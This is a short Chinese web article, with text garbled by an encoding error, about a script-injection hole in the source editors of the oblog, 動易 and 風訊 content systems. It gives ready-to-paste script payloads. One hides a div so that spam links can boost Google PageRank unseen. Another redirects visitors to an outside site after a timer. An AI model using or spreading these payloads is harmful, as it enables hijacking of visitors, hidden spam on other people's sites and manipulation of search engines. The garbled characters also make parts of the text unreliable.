關(guān)于oblog、動(dòng)易、風(fēng)訊等擁有源碼編輯的程序漏洞淺析
目前的oblog、動(dòng)易、風(fēng)訊等一系列著名的系統(tǒng),都存在源碼編輯漏洞。
具體操作是:
1,進(jìn)入"源碼"編輯
2,輸入階段公分四段:
第一段:<此處輸入正文,做事需要手下留情嘛,來點(diǎn)實(shí)際內(nèi)容>
第二段:<script>document.write(’<div style="display:none">’);</script>
第三段:<此處輸入作弊鏈接,獲取google的pr值,此處的內(nèi)容將不會(huì)被瀏覽者看 到,且不會(huì)被搜索引擎發(fā)現(xiàn)>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT>
也可以不設(shè)置時(shí)間或?qū)r(shí)間設(shè)置為0,那么點(diǎn)擊該頁(yè)面后將直接跳轉(zhuǎn)到指定頁(yè)面。
相關(guān)文章
關(guān)于9行代碼導(dǎo)致系統(tǒng)崩潰的分析整理
關(guān)于9行代碼導(dǎo)致系統(tǒng)崩潰的分析整理...2007-01-01揭露88red生成htm靜態(tài)頁(yè)面企業(yè)建站系統(tǒng)漏洞
88red生成htm靜態(tài)頁(yè)面企業(yè)建站系統(tǒng)后門利用代碼,用88red做企業(yè)占的朋友可要注意了2008-05-05